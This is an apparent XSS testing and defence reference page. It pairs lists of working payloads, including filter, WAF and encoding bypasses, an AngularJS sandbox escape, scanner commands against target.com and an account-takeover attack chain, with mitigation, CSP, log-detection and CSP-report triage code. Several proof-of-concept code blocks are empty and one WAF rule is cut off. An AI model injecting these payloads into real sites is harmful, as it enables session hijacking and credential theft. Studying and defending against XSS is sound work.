Description

What is XSS?

Cross-Site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the victim's web browser by injecting malicious code into a trusted website. XSS occurs when web applications take untrusted data and render it without proper validation or encoding.

XSS allows attackers to:
  • Steal session cookies and hijack user sessions
  • Deface websites or inject malicious content
  • Redirect users to malicious websites
  • Perform keylogging and form hijacking
  • Access sensitive information in the DOM
  • Deliver malware to users

XSS Types:

  • Reflected XSS: Malicious script is part of the request sent to the server and is reflected back
  • Stored XSS: Malicious script is permanently stored on the target server
  • DOM-based XSS: Vulnerability exists in client-side code rather than server-side
  • Blind XSS: XSS payload is stored and executed in a different part of the application

๐Ÿท๏ธ Classification

  • Vulnerability Type: Client-Side Injection (CWE-79)
  • OWASP Category: A03:2021 - Injection
  • CAPEC:
    • CAPEC-63: Cross-Site Scripting
    • CAPEC-209: Cross-Site Scripting using Flash
    • CAPEC-242: Cross-Site Scripting in Error Messages
  • XSS Subtypes: Reflected, Stored, DOM-based, Blind

Attack Surface

XSS can occur in various input points:

  • ✅ Search Fields: Query parameters
  • ✅ Comment Sections: Blog comments, forum posts
  • ✅ User Profiles: Display names, bio fields
  • ✅ URL Parameters: GET parameters reflected in page
  • ✅ HTTP Headers: User-Agent, Referer
  • ✅ File Names: Uploaded file names displayed
  • ✅ Chat/Message Boards: User-submitted content
  • ✅ Product Reviews: E-commerce reviews

โš ๏ธ Preconditions

  • User Input: Application accepts user input and displays it without encoding
  • No Sanitization: Input is not sanitized or validated
  • No Output Encoding: Output is not properly encoded for HTML context
  • JavaScript Context: Input can break out of JavaScript strings

๐Ÿ” Detection

Manual Testing:

  • Inject basic payload: <script>alert(1)</script>
  • Test with image onerror: <img src=x onerror=alert(1)>
  • Test SVG: <svg onload=alert(1)>
  • Test event handlers: <body onload=alert(1)>

Automated Tools:

  • Burp Suite: Active/passive scanning
  • OWASP ZAP: Spider and scan
  • nuclei: XSS templates
  • XSStrike: Advanced XSS detection

Burp Suite Workflow

  1. Browse target application normally
  2. Review Proxy history for reflection points
  3. Send reflected parameter to Repeater
  4. Test with basic XSS payloads
  5. Check if payload is reflected without encoding
  6. Escalate to exploit - steal cookies, perform actions
# In Repeater, test:
GET /search?q= HTTP/1.1
Host: target.com

# If response contains the script tag unencoded - VULNERABLE

โš™๏ธ Tool Automation

XSStrike

Advanced XSS detection and exploitation

๐Ÿ›ก๏ธ Burp Suite

Manual testing with Intruder

Nuclei

Template-based XSS scanning

๐Ÿ” Dalfox

Go-based XSS scanner

# XSStrike
python3 xsstrike.py -u "http://target.com/search?q=test"

# nuclei
nuclei -u "http://target.com" -t templates/xss.yaml

# dalfox
dalfox url "http://target.com/search?q=test"

Basic Payloads

Detection Payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<input onfocus=alert(1) autofocus>
Event Handlers
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video onerror=alert(1)>
<audio src=x onerror=alert(1)>
๐Ÿ“ HTML Context Breakout
</script><script>alert(1)</script>
<img src=x alt="><script>alert(1)</script>
<div><script>alert(1)</script>
</title></style></script><script>alert(1)</script>

Advanced Payloads

DOM-based XSS
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<svg/onload=location='javascript:alert(1)'>
<body/onload=Function('alert(1)')()>
Polyglot
javascript:/*--><svg/onload=alert(1)-->
<img src=x:alert(alt) onerror=eval(alt) alt="aler\ t(1)">
Filter Bypass
<scr\ ipt>alert(1)</scr\ ipt>
<scr\x00ipt>alert(1)</scr\x00ipt>
<SCR\ IPT>alert(1)</SCR\ IPT>

AI-Generated Payloads

Context-aware payloads for specific scenarios:

AngularJS Context
{{constructor.constructor('alert(1)')()}}
<img src=x ng-on-click="$event.view.alert(1)">
React/Mobile Context
<div onMouseOver="alert(1)">test</div>
Template Engines
{{7*7}} - Jinja2/Twig
${7*7} - ERB
<%= 7*7 %> - Rails

Context-Aware Payloads

๐Ÿ“ JavaScript String Context
';alert(1);//
";alert(1);//
'-alert(1)-'
"-alert(1)-"
๐Ÿ›ก๏ธ WAF Bypass
<script>al\x65rt(1)</script>
<img src=x onerror=window['alert'](1)>
<body><script>alert(1)</script></body>
๐Ÿ—„๏ธ Browser-Specific
Firefox: <svg><animate onbegin=alert(1) attributeName=x>
Chrome: <script>alert(1)</script>
Edge: <details open ontoggle=alert(1)>

๐Ÿ“ Proof of Concept

Vulnerable Code Example:

<?php
// PHP - Vulnerable code: the query parameter is echoed into the HTML body without encoding
$name = $_GET['name'];
echo "Welcome, " . $name;

// Attacker requests:
// http://target.com/welcome.php?name=

// Result: Script executes in user's browser, stealing cookies

Cookie Theft PoC:

// Payload to steal cookies


// When victim visits, their cookies are sent to attacker

Request / Response

Attacker Request:

GET /search?q= HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0

Server Response (Vulnerable):

HTTP/1.1 200 OK
Content-Type: text/html



Search results for: 
...

Impact Analysis

Severity: HIGH (CVSS 7.3)

Session Hijacking:
  • Steal session cookies
  • Session fixation attacks
  • Access user accounts
Credential Theft:
  • Keylogging user input
  • Phishing via injected forms
  • Credential harvesting
Malware Delivery:
  • Redirect to malicious sites
  • Drive-by downloads
  • Exploit kit delivery

Advanced Exploitation

1. Session Hijacking:

// Steal session


// Session fixation

2. Keylogging:

// Record keystrokes

3. Form Hijacking:

// Modify form action

4. DOM Modification:

// Modify page content

Attack Chains

Chain 1: XSS to Account Takeover
  1. Find XSS in search parameter
  2. Inject cookie-stealing payload
  3. Wait for admin to visit
  → Steal admin session, access admin panel
Chain 2: Stored XSS to Defacement
  1. Post comment with XSS payload
  2. Payload stored in database
  3. All users viewing page execute payload
  → Mass credential theft or defacement

Test Cases

ID | Test Case        | Payload                            | Expected
1  | Basic Script Tag | <script>alert(1)</script>          | Alert popup
2  | Image Onerror    | <img src=x onerror=alert(1)>       | Alert popup
3  | SVG Onload       | <svg onload=alert(1)>              | Alert popup
4  | Event Handler    | <body onload=alert(1)>             | Alert popup
5  | DOM-based        | <img src=x onerror=eval(atob(...))> | Alert popup

๐Ÿ›ก๏ธ Mitigation

โœ… Output Encoding: Encode all untrusted data based on the context (HTML, JavaScript, URL, CSS)

โœ… Content Security Policy (CSP): Implement strict CSP headers to prevent inline script execution

โœ… Input Validation: Validate and sanitize all user inputs

โœ… HTTPOnly Cookies: Set HttpOnly flag on session cookies to prevent JavaScript access

๐Ÿฐ Advanced Mitigation

1. Content Security Policy:

# Strict CSP Header
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'

# Allow specific sources
Content-Security-Policy: script-src 'self' https://trusted.cdn.com;

2. Output Encoding Libraries:

# Python - html.escape()
import html
safe_output = html.escape(user_input)

# JavaScript - DOMPurify
const clean = DOMPurify.sanitize(dirty);

3. Cookie Security:

# Set secure, HttpOnly, SameSite cookies
Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict
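The following Python example is added here and is not code from the original page. It mirrors the vulnerable PHP welcome page from the Proof of Concept section in Python and places it beside a hardened renderer that applies the context-aware encoding, strict CSP header and cookie flags listed in this section. The `render_*` and `encode_for_*` function names, the `payload_survives` retest helper and the session-id placeholder are assumptions made for the example; the input is the page's basic detection payload.

```python
import html
import json
import urllib.parse

# Constructed sample input: the page's basic detection payload.
UNTRUSTED = "<script>alert(1)</script>"


def render_vulnerable(name: str) -> str:
    """Same flaw as the PHP snippet: the parameter is concatenated into HTML unencoded."""
    return "Welcome, " + name


def encode_for_html(value: str) -> str:
    """HTML body and double-quoted attribute context: escape & < > " and '."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """JavaScript string literal inside a <script> block.

    json.dumps escapes quotes, backslashes and control characters but leaves
    '<', '>' and '&' alone, so a "</script>" inside the literal would still
    close the script element; those three are written as \\u escapes as well.
    """
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def encode_for_url(value: str) -> str:
    """URL query-parameter context: percent-encode everything but unreserved characters."""
    return urllib.parse.quote(value, safe="")


def render_safe(name: str) -> str:
    """The same value placed in four contexts, each with the encoder for that context."""
    return (
        "<p>Welcome, " + encode_for_html(name) + "</p>\n"
        '<input type="text" value="' + encode_for_html(name) + '">\n'
        "<script>var user = " + encode_for_js_string(name) + ";</script>\n"
        '<a href="/search?q=' + encode_for_url(name) + '">search again</a>'
    )


def security_headers() -> dict:
    """Response headers matching the strict CSP and cookie settings listed above.

    The session value is a placeholder; a real id is an opaque random token.
    """
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; "
            "object-src 'none'; frame-ancestors 'none'"
        ),
        "Set-Cookie": "session=<opaque-random-id>; Secure; HttpOnly; SameSite=Strict",
    }


def payload_survives(rendered: str, payload: str) -> bool:
    """Retest helper: does the raw payload appear verbatim in the rendered output?"""
    return payload in rendered


if __name__ == "__main__":
    print("vulnerable:", payload_survives(render_vulnerable(UNTRUSTED), UNTRUSTED))  # True
    print("hardened:  ", payload_survives(render_safe(UNTRUSTED), UNTRUSTED))       # False
    print(render_safe(UNTRUSTED))
```

The point of the four contexts is that one encoder does not fit all of them: `html.escape` is correct for the body and quoted attributes, but inside a `<script>` string it would leave a literal `</script>` intact, and inside a URL it would leave `?`, `&` and `=` unencoded. Each sink gets the encoder for its own grammar, and the CSP header is the backstop if an encoder is missed.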

Monitoring & Detection

WAF Rules:

# Detect XSS patterns in requests
SecRule REQUEST_URI "@rx (

SIEM Detection:

  • Alert on script tags in user input
  • Monitor for event handlers (onclick, onerror, onload)
  • Detect javascript: protocol in parameters
  • Alert on unusual encoding patterns

๐Ÿ” Security Controls

ControlImplementationPriority
Output EncodingContext-aware encoding of all outputCritical
CSPStrict Content Security PolicyHigh
Input ValidationWhitelist validation + sanitizationHigh
HTTPOnly CookiesSet HttpOnly and Secure flagsHigh
SameSite CookiesSet SameSite=Strict/LaxMedium
X-XSS-ProtectionEnable browser XSS filterLow

Bypass Techniques

๐Ÿ›ก๏ธ Filter Bypass
<scr\x00ipt> - Null byte
<scr<script>ipt> - Recursive
<scrscriptipt> - Double tag
<svg><script>alert(1)</script> - SVG context
Encoding Bypass
%3Cscript%3E - URL encoding
<script - HTML entities
\x3cscript\x3e - Hex encoding
Note: Use only in authorized testing engagements.

๐Ÿ› ๏ธ Tools & Commands

XSStrike

xsstrike.py -u "http://target.com"

๐Ÿ›ก๏ธ Burp Suite

Intruder + Scanner

Dalfox

dalfox url "http://target.com"

๐Ÿ” DOM Invader

Burp DOM XSS scanner

Retest Steps

Step | Action                      | Validation
1    | Implement output encoding   | Code review
2    | Deploy CSP header           | Test that inline scripts fail
3    | Re-test with script tag     | Script not executed
4    | Re-test event handlers      | Not executed
5    | Verify cookies are HttpOnly | document.cookie empty

โš™๏ธ Detection Logic

Static Analysis:

  • Scan for unescaped user input in HTML
  • Check for proper output encoding
  • Verify CSP headers
  • Check cookie flags

Dynamic Testing:

  • Fuzz all input points with XSS payloads
  • Test in different contexts
  • Verify CSP blocks execution

Threat-Hunting Notes

IOCs:

  • Script tags in web logs
  • Event handlers in parameters
  • javascript: protocol in URLs
  • Unusual encoding in logs
  • High volume of XSS attempts from single IP
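As an added example that is not part of the original page, the following Python turns the SIEM detection list under Monitoring & Detection and the IOC list above into detection logic run over web-server log lines: it decodes each request target (twice, to catch double encoding), then looks for script tags, event handlers and the javascript: scheme, and finally applies a per-IP volume threshold. The log lines, IP addresses, the two-round decoding and the threshold of three hits per IP are constructed for the example; the indicator names are mine, not from any product.

```python
import re
import urllib.parse
from collections import Counter

# Constructed sample log lines in combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=laptop HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 734 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 740 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "GET /redirect?url=javascript:alert(1) HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:43 +0000] "GET /search?q=%253Cscript%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /profile?name=O%27Brien HTTP/1.1" 200 600 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators from the SIEM / IOC lists; matched against the decoded target.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
}


def classify(target: str) -> list:
    """Return the indicator names matched by one request target."""
    findings = []
    once = urllib.parse.unquote(target)
    twice = urllib.parse.unquote(once)
    # Percent-encoding that only appears after the first decode means the
    # client double-encoded the value: the "unusual encoding" indicator.
    if re.search(r"%[0-9a-fA-F]{2}", once):
        findings.append("double_encoding")
    for name, pattern in PATTERNS.items():
        if pattern.search(twice):
            findings.append(name)
    return findings


def scan_log(text: str, per_ip_threshold: int = 3) -> dict:
    """Scan log text; returns per-line hits and the IPs at or above the threshold."""
    hits = []
    per_ip = Counter()
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        found = classify(match.group("target"))
        if found:
            hits.append({"ip": match.group("ip"),
                         "target": match.group("target"),
                         "indicators": found})
            per_ip[match.group("ip")] += 1
    noisy = sorted(ip for ip, count in per_ip.items() if count >= per_ip_threshold)
    return {"hits": hits, "noisy_ips": noisy}


if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG)
    for hit in result["hits"]:
        print(hit["ip"], hit["indicators"], hit["target"])
    print("high-volume sources:", result["noisy_ips"])
```

The benign `O%27Brien` line is there on purpose: single-quote encoding is normal for a name field and must not fire, while `%253Cscript%253E` is flagged twice, once for the double encoding itself and once for the script tag it decodes to. Matching after decoding rather than on the raw URL is what keeps the URL-encoded and double-encoded variants from the Encoding Bypass section from slipping past the rule.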

๐Ÿ›ก๏ธ Defensive Detection Ideas

1. Browser-Based Detection:

  • Deploy CSP-report-uri to collect violations
  • Monitor for XSS in report-uri endpoints

2. RASP:

  • Runtime application self-protection
  • Detect and block XSS at runtime
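Added example, not from the original page, for the CSP report-uri idea under Browser-Based Detection: a parser for the violation reports a browser posts to the reporting endpoint, normalising both the legacy `report-uri` JSON (`csp-report` object) and the Reporting API batch format (`csp-violation` entries), and a triage function that singles out the two violation shapes that matter for XSS hunting, a blocked inline script and a script loaded from an origin outside the allow-list. The sample reports, the `app.example` and `cdn.evil.example` hosts, the `TRUSTED_SCRIPT_ORIGINS` set and the triage labels are all constructed for the example.

```python
import json
from urllib.parse import urlsplit

# Constructed sample reports, not captured from a real browser.
# Legacy report-uri format: one JSON object wrapped in "csp-report".
LEGACY_REPORT = json.dumps({
    "csp-report": {
        "document-uri": "https://app.example/search?q=laptop",
        "violated-directive": "script-src 'self'",
        "effective-directive": "script-src",
        "blocked-uri": "inline",
        "script-sample": "alert(1)",
        "source-file": "https://app.example/search",
        "line-number": 42,
    }
})
# Reporting API (report-to) format: a JSON array of typed reports.
REPORTING_API_BATCH = json.dumps([{
    "type": "csp-violation",
    "age": 12,
    "url": "https://app.example/profile",
    "body": {
        "documentURL": "https://app.example/profile",
        "effectiveDirective": "script-src",
        "blockedURL": "https://cdn.evil.example/x.js",
        "disposition": "enforce",
    },
}])

# Origins the policy's script-src is expected to allow (example values).
TRUSTED_SCRIPT_ORIGINS = {"https://app.example", "https://trusted.cdn.com"}


def parse_csp_reports(body: str) -> list:
    """Normalise either report format into dicts with the same keys."""
    data = json.loads(body)
    records = []
    if isinstance(data, dict) and "csp-report" in data:
        r = data["csp-report"]
        records.append({
            "document": r.get("document-uri", ""),
            "directive": r.get("effective-directive") or r.get("violated-directive", ""),
            "blocked": r.get("blocked-uri", ""),
            "sample": r.get("script-sample", ""),
        })
    elif isinstance(data, list):
        for item in data:
            if item.get("type") != "csp-violation":
                continue  # other Reporting API report types are not CSP
            b = item.get("body", {})
            records.append({
                "document": b.get("documentURL", ""),
                "directive": b.get("effectiveDirective", ""),
                "blocked": b.get("blockedURL", ""),
                "sample": b.get("sample", ""),
            })
    return records


def triage(record: dict) -> str:
    """Label one violation.

    'inline-script' and 'untrusted-script-origin' are the ones worth alerting on
    when hunting for XSS; anything else is left for manual review.
    """
    if not record["directive"].startswith("script-src"):
        return "review"
    blocked = record["blocked"]
    if blocked in ("inline", "eval"):
        return "inline-script"
    parts = urlsplit(blocked)
    origin = f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""
    if origin and origin not in TRUSTED_SCRIPT_ORIGINS:
        return "untrusted-script-origin"
    return "review"


if __name__ == "__main__":
    for body in (LEGACY_REPORT, REPORTING_API_BATCH):
        for rec in parse_csp_reports(body):
            print(triage(rec), rec["document"], rec["blocked"], rec["sample"])
```

A blocked inline script on a page that ships no inline scripts of its own is the strongest signal a reflected or stored payload reached a real user's browser, which is exactly what the retest table's "inline scripts fail" check relies on. Browser extensions also generate `inline` and third-party-origin violations, so the triage labels are a queue for review rather than a confirmed-incident verdict.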